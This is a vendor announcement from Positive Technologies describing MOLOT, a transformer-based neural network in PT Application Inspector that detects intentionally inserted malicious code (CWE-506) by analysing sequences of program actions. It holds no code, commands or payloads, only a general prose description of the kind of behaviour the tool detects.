Positive Technologies has developed MOLOT, a neural network for detecting malicious code in programs written in the world's most popular languages: Python, JavaScript, and TypeScript. Like large language models, MOLOT is built on the transformer architecture. The neural network already runs in PT Application Inspector, a code analyzer that searches for vulnerabilities and weaknesses in code, starting with release 6.0.
Unlike classic analysis tools, which search for individual dangerous code fragments using predefined rules, MOLOT views a program as a sequence of actions and evaluates whether they add up to a suspicious scenario. This makes it possible to detect malicious code 15% more accurately than classic rules and makes PT Application Inspector the second SAST product in the world, that is, a static application security testing tool, capable of detecting such threats by program behavior.
Most code analysis tools look for vulnerabilities, that is, errors and configuration weaknesses through which a project can be attacked from the outside. But recent incidents, including the LiteLLM case, show that intentional insertion of malicious code into a project itself often goes unnoticed during security checks. Such code does not exploit vulnerabilities; it runs with the same privileges as a regular application, so traditional tools do not notice it. This class of threats is described in CWE-506.
The challenge is that individual actions of malicious code look harmless: reading a file, sending a network request, decrypting a string, or launching a process. All of this also appears in ordinary applications. Code becomes dangerous when these actions are arranged in a specific sequence, for example, when a script reads a login and password, encodes them, and sends them to a third-party server. Classic rules that check individual constructs miss such scenarios.
MOLOT is designed differently. It extracts all actions that a program performs during execution from the codebase: network access, file access, process launches, use of cryptography, and so on. These actions are collected into a sequence and fed into the neural network. Just as large language models learn to understand texts from sequences of words, MOLOT learns to understand programs from sequences of their actions and to distinguish scenarios typical of malicious code from ordinary ones.
